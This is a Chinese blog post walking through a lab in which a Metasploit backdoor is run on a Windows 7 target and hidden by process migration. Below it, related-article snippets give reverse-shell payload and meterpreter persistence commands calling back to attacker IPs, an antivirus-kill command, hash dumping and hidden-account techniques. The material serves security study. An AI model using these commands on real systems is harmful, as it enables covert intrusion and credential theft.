Windos权限维持-隐藏

已于 2022-05-27 17:15:05 修改
阅读量102 收藏
点赞数
文章标签: 系统安全
于 2022-05-27 15:51:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66061261/article/details/125005461
版权

Windos权限维持-隐藏篇

  • 进程注入

环境:windows7企业版,kail

  1. 先用kail生成一个msf后门

        指定kail本机IP,使用端口,以及后门名称

        

 

  1. 把生成的后门放进我们的靶机win7

  1. 进入我们的msfconsole设置并进行exploit

  1. 靶机运行我们生成我们的后门,我们就会获得当前登录用户的权限

  1. 隐藏进程,ps查看进程

进程信息里我们可以清楚看到我们的后门进程,我们进行进程迁移,把我们的后门进行隐藏

迁移进程后,我们的权限变成的system,

  1. ps再次查看进程

发现我们的后门进程没了,并且我们依然可以控制靶机

m0_66061261
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
window-vmware-linux 虚拟机搭建
12-21
window-vmware-linux 虚拟机搭建及网络配置,亲测可用
应急响应实战笔记——权限维持篇:① Windows权限维持&隐藏
君逍遥o
03-28 819
攻击者在获取服务器权限后,通常会用一些后门来维持权限,如果你想让你的后门保持的更久些,那么请隐藏好它,使之不易被管理员发现。
权限维持篇---Windows权限维持--隐藏
永不垂头的博客
04-29 1114
权限维持篇—Windows权限维持隐藏篇 文章目录权限维持篇---Windows权限维持--隐藏篇前言一、隐藏文件二、隐藏账号三、端口复用四、进程注入五、结束六、我的公众号 前言 攻击者在获取服务器权限后,通常会用一些后门来维持权限,如果你想让你的后门保持的更久些,那么请隐藏好它,使之不易被管理员发现。 一、隐藏文件 1、利用文件属性最简单的一种隐藏文件的方式,文件右键属性,勾选隐藏,点击确定后,在这个文件里看不到刚刚的文件了。 如果要让文件显示出来,就点击查看,勾选显示隐藏的文件,文件就显示出来。
学习进阶之路 #权限维持]P1、隐藏用户的创建与利用
ALLEN'Blog
03-15 241
导入成功后回到管理工具中的查看用户与用户组的页面,发现用户组和用户已经没有admin$这个用户的存在了,但实则上我们仍可以用这个用户的密码进行登录RDP,而且可以相当于。netsh 是 windows 的网络配置命令,advfirewall firewall 意思为防火墙的高级设置,add rule 是添加一条规则,name。发现用户未授权,这时候又多了一个利用条件,要在右下的选择用户下,添加admin$用户的用户名,才能正常登录3389。,在工具栏上的 **“编辑 > 权限” **中设置权限 ,将。
Windows权限维持1:账号隐藏
da_chuan_chuan的博客
12-30 2925
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
Windows权限维持--创建隐藏账户(影子账户)
qq_54735393的博客
11-03 3936
影子账户就是在windows中比较隐蔽的用户,一般在后渗透的权限维持阶段会用到。影子账户主要是利用在权限维持上,通过先建立带$符号的账户,然后利用注册表修改里面的值,使得管理员无法通过cmd及计算机管理等地方查看攻击者所创建的账户,从而实现权限维持
MSF之meterpreter权限维持
梦想专栏
07-30 2058
00×01 首先,我们先来生成一个 meterpreter 类型的 PALOAD : msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1211 X >x.exe 00×02 建立反弹处理 exploit : use exploit/mutil/handler set payload wi...
网安学习日志(7)windows权限维持
qq_41819426的博客
01-17 2511
什么是权限维持? 在我们通过入侵手段进入对方服务器后,通常会使用一些后门来维持权限 方法诸如隐藏文件,隐藏账户等方法在这里不进行赘述(方法已经落后,容易被工具直接检测出来) 1.端口复用 该后门的基本原理是使用Windows 的远程管理管理服务WinRM,组合HTTP.sys驱动自带的端口复用功能,一起实现正向的端口复用后门。 WinRM服务 WinRM全称是Windows Remote Management,是微软服务器硬件管理功能的一部分,能够对本地或远程的服务器进行管理。WinRM服务能够让管理员远程
window版本redis-server6.2.14
11-06
window版本redis-6.2.14版本,支持32位和64位操作系统,使用Cygwin工具生成的EXE可执行文件
window-placement-demo
08-04
多屏窗口放置演示 抽象的 这是提议的API 的基本演示。 可视化一组连接的显示器 ...$ cd window-placement-demo $ python -m SimpleHTTPServer & $ chrome --enable-blink-features=WindowPlacement --
docker-compose-window-2.14.2.exe
12-27
docker-compose-window-2.14.2.exe免费下载
window-scroll-position:React钩子的窗口滚动位置
05-06
@rehooks/window-scroll-position React钩子的滚动位置 注意:这是使用新的,该可能会更改,直到React 16.7最终版本为止。 您需要在^16.7.0-alpha.0处安装react , react-dom等 安装 yarn add @rehooks/window-...
权限维持window几种隐藏技术
07-31 310
“真正”隐藏文件 使用Attrib +s +a +h +r命令就是把原本的文件夹增加了系统文件属性、存档文件属性、只读文件属性和隐藏文件属性。 attrib +s +a +h +r c:\test 这样就做到了真正的隐藏,不管你是否显示隐藏文件,此文件夹都看不见 破解隐藏文件: 打开电脑文件夹选项卡,取消”隐藏受保护的操作系统文件“勾选,把”隐藏文件和文件夹“下...
后渗透之各种维持权限的后门原理即利用
p_utao的博客
09-13 3494
前言 在拿到最高权限后,我们就应该建立后门(backdoor)了,以维持对目标主机的控制权,这样一来,即使我们所利用的漏洞被补丁程序修复了,还可以通过后门继续控制目标系统。 后门简单来说就是一个留在目标主机上的系统,它可以使攻击者随时连接到目标主机,大多数情况下,后门是一个运行在目标主机上的隐藏进程,它允许一个普通的、未授权的用户控制计算机。 操作系统后门 后门泛指绕过目标系统安全控制体系的正规用户认证过程,从而维持我们对目标系统的控制权,以及隐匿控制行为的方法。Meterpreter提供 了Persis
使用msfconsole拿到win2008 R2的shell并进行维权二(权限维持
X_xsj6的博客
08-11 489
使用msfconsole拿到win2008 R2的shell并进行维权二(权限维持) 四、维权后门 4.1查询服务器信息 4.1.1查看当前用户以及权限 4.1.2查看当前已有用户 4.1.3查看当前计算机名 4.2权限维护: 4.2.1创建账户(创建新用户的密码必须符合密码复杂度) 4.2.2将新建账户加入到管理员组 4.2.3开启靶机远程桌面功能 reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\...
kali linux权限维持,msfconsole权限维持
weixin_30481539的博客
04-29 603
获取管理员hash获得shell后,执行命令getsystem提高权限为管理员权限,接着执行命令run post/windows/gather/hashdump获取hashAdministrator:500:aad3b435b51404eeaad3b435b51404ee:bd75068c6729aacd2fe3497b43bb664e:::权限维持执行命令use exploit/windows/...
windows常见后门隐藏权限维持方法及排查技术
3569
04-24 6584
https://xz.aliyun.com/t/4842 这片文章中隐藏webshell我觉得很nice ... 进程注入以前试过 ... wmi 和 bitsadmin 可以了解下 ... 常见backdoor和persistence方式方法 系统工具替换后门 Image 劫持辅助工具管理器 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\...
meterpreter后渗透之权限维持
weixin_44255856的博客
08-09 3035
Persistence后门 使用此方法建议运行前关闭杀毒软件 Run post/windows/manage/killav 输入run persistence -S -U -X -i 5 -p 6666 -r 192.168.85.130创建一个持久性的后门。 详细信息如下: -A 自动启动一个匹配的漏洞/多/处理程序来连接到代理 -L如果不使用%TEMP%,则选择目标主机中写入有效负载的...
Linux系统安全加固:无需WAF也能有效防御黑客攻击
最新发布
@云安全小杜
07-02 864
Web应用防火墙(WAF)是现代网络安全架构中的重要组成部分,用于保护Web应用程序免受各种攻击。然而,对于基于Linux的服务器,即使没有部署WAF,通过合理的配置和策略,依然能够构建起坚固的防线。本文将探讨在没有WAF的情况下,如何通过Linux系统自身的安全机制和一些开源工具,实现对黑客攻击的有效防御。
npm window-build-tools
08-30
npm window-build-tools是一个用于在Windows操作系统上构建Node.js项目的工具。它是一个npm软件包,可以通过npm安装和使用。 在Windows操作系统上构建Node.js项目可能会遇到一些问题,例如缺少一些必要的构建工具或...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值